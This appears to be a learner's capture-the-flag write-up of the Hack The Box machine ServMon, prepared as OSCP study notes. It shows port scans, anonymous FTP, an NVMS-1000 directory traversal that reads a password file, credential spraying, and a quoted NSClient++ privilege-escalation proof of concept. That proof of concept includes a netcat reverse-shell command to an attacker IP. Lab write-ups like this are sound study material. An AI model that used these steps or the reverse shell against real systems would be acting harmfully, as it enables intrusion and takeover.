# Port Scanning - Nmap
First, I performed a SYN scan against all ports
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 21:17 CDT
Nmap scan report for 10.10.10.184
Host is up (0.054s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5666/tcp open nrpe
6063/tcp open x11
6699/tcp open napster
8443/tcp open https-alt
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
```
Next, I performed a detailed connect scan with `-sC` and `-sV` options on open ports found.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 21,22,80,135,139,445,5666,6063,6699,8443,49664-49670
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 21:20 CDT
Nmap scan report for 10.10.10.184
Host is up (0.054s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
22/tcp open ssh OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
| 256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_ 256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp open http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6063/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
|_ :Saturday
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.95%I=7%D=6/17%Time=6852225C%P=aarch64-unknown-linux-gnu%
SF:r(NULL,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20t
SF:ext/html\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\
SF:x20text/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthI
SF:nfo:\x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DT
SF:D\x20XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xh
SF:tml1/DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www
SF:\.w3\.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\
SF:n\x20\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\
SF:r\n\x20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>
SF:\r\n")%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20te
SF:xt/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\
SF:x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20
SF:XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/
SF:DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\
SF:.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20
SF:\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x
SF:20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"
SF:)%r(RTSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r
SF:\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML
SF:\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/x
SF:html1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/
SF:1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\
SF:x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x2
SF:0\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=6/17%Time=68522264%P=aarch64-unknown-li
SF:nux-gnu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLo
SF:cation:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0\0\0\0:Saturda
SF:y\0\0\0s\0d\0a\0y\0:\0T\0h\0u\0:\0T\0h\0u\0r\0s\0")%r(HTTPOptions,36,"H
SF:TTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20foun
SF:d")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r
SF:\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404\r\n
SF:Content-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOptions,36
SF:,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20f
SF:ound");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-18T01:22:06
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -1h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.83 seconds
```
And finally last scan against top 1,000 UDP ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-17 21:25 CDT
Nmap scan report for 10.10.10.184
Host is up (0.044s latency).
Not shown: 999 open|filtered udp ports (no-response)
PORT STATE SERVICE
829/udp closed pkix-3-ca-ra
Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds
```
# Footprinting
### FTP - Port 21
From the Nmap results, we can see that FTP server allows `Anonymous Login`. Therefore, let's first see what the FTP server might have for us.
there a directory named `Users` and inside Users, there were two directories `Nadine` and `Nathan`. There was a file named `Confidential.txt` inside Nadine and `Notes to do.txt` file inside Nathan.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ftp $IP
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:parallels): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||51633|)
125 Data connection already open; Transfer starting.
02-28-22 07:35PM <DIR> Users
<SNIP>
02-28-22 07:36PM <DIR> Nadine
02-28-22 07:37PM <DIR> Nathan
<SNIP>
02-28-22 07:36PM 168 Confidential.txt
<SNIP>
02-28-22 07:36PM 182 Notes to do.txt
```
##### Confidential.txt
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
```
##### Notes to do.txt
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
```
### SMB - PORT 443
I cannot access or list SMB shares without valid credentials
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -N -L //$IP/
session setup failed: NT_STATUS_ACCESS_DENIED
```
### HTTPS - PORT 8443
We need to find the password first.
![[Pasted image 20250617230933.png]]
### HTTP - PORT 80
![[Pasted image 20250617214359.png]]
##### gobuster
gobuster says the server returns 200 status code for non-existing urls.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.184
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.184/85317c36-4282-45b5-ba76-4893c3f74f9e => 200 (Length: 118). To continue please exclude the status code or the length
```
And I confirmed it indeed does
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ curl -I http://$IP/wook413
HTTP/1.1 200 OK
Content-type: text/xml
Content-Length: 118
Connection: close
AuthInfo:
```
It appears there's a directory traversal vulnerability to NVMS 1000
![[Pasted image 20250617223451.png]]
`47774.txt` poc tells me I can make a request to the URL path of `/../../../../../../../../../../../../windows/win.ini` and it returns some outputs.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat 47774.txt
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
I followed the poc and it gave me exactly the same output.
![[Pasted image 20250617223903.png]]
Nadine wrote a letter to Nathan saying that she left `Passwords.txt` on Nathan's desktop. Let's see if we could get that information.
It gave me 7 different lines of passwords.
```
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
```
![[Pasted image 20250617224818.png]]
I created two files named users and passwords. Let's see if any combination of those 2 files is a valid set of credentials.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat users && cat passwords
administrator
nadine
nathan
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
```
We found a valid set of credentials! `nadine:L1k3B1gBut7s@W0rk`
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ crackmapexec smb $IP -u users -p passwords
<SNIP>
SMB 10.10.10.184 445 SERVMON [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:L1k3B1gBut7s@W0rk STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:0nly7h3y0unGWi11F0l10w STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:IfH3s4b0Utg0t0H1sH0me STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\administrator:Gr4etN3w5w17hMySk1Pa5$ STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:1nsp3ctTh3Way2Mars! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:Th3r34r3To0M4nyTrait0r5! STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [-] ServMon\nadine:B3WithM30r4ga1n5tMe STATUS_LOGON_FAILURE
SMB 10.10.10.184 445 SERVMON [+] ServMon\nadine:L1k3B1gBut7s@W0rk
```
I was able to log into SSH server with the found credentials
```bash
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>whoami
servmon\nadine
nadine@SERVMON C:\Users\Nadine>
```
Found `user.txt` flag
```bash
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 20C1-47A1
Directory of C:\Users\Nadine\Desktop
06/17/2025 01:14 PM <DIR> .
06/17/2025 01:14 PM <DIR> ..
06/17/2025 01:14 PM 378 evil.bat
06/17/2025 01:14 PM 59,392 nc.exe
06/17/2025 10:37 AM 34 user.txt
06/17/2025 12:01 PM 10,156,032 winPEASany.exe
4 File(s) 10,215,836 bytes
2 Dir(s) 6,246,989,824 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
fd97...
```
# Privilege Escalation
In the path of `C:\Program Files\NSClient++\nsclient.ini`, I found what appears to be valid password that I could use on port 8443.
```cmd
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
```
Or if you click on `Forgotten password?` you will see this pop-up .
![[Pasted image 20250617231242.png]]
you get the current password if you enter the command in the pop-up.
```cmd
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
```
However, I still cannot login with the password. Why?
![[Pasted image 20250617231655.png]]
Back to `nsclient.ini`, it's mentioned the only allowed host is `localhost`
```cmd
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
```
We're setting up local port forwarding, and here's what the command below does:
- My system attempts to connect to the SSH remote server at `$IP` (10.10.10.184) as the user `nadine`
- Once the SSH connection is successfully established, any traffic originating from my local system's port 8443 will be securely forwarded through the SSH tunnel to the remote server (10.10.10.184)
- The remote server then receives this traffic and routes it to its own `localhost:8443` (meaning, to port 8443 on the remote server itself)
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ssh nadine@$IP -L 8443:127.0.0.1:8443
[email protected]'s password:
```
Now after setting up the tunnel, I was able to log in with the password found. Notice the IP address in the URL is `127.0.0.1`
![[Pasted image 20250617232802.png]]
I found `NSClient++` in searchsploit that's specifically targeting PrivEsc.
![[Pasted image 20250617233859.png]]
This is the PoC of the exploit.
```
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64
Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.
The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config.
Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.
Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret
2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler
3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe
4. Setup listener on attacking machine
nc -nlvvp 443
5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat
6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar
7. Restart the computer and wait for the reverse shell on attacking machine
nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Program Files\NSClient++>whoami
whoami
nt authority\system
Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System
```
I was unable to finish the Privilege Escalation and get the `root.txt` flag. I looked up other people's write ups including the one by popular `0xdf`. People have been voicing about how unstable this box is especially the PE part. Anyways I learned a ton doing this box even up to the PE point. Therefore, I have no complaints. The whole purpose of doing these boxes out of LainKusanagi's list is to learn and study for OSCP, not pwning more HTB boxes.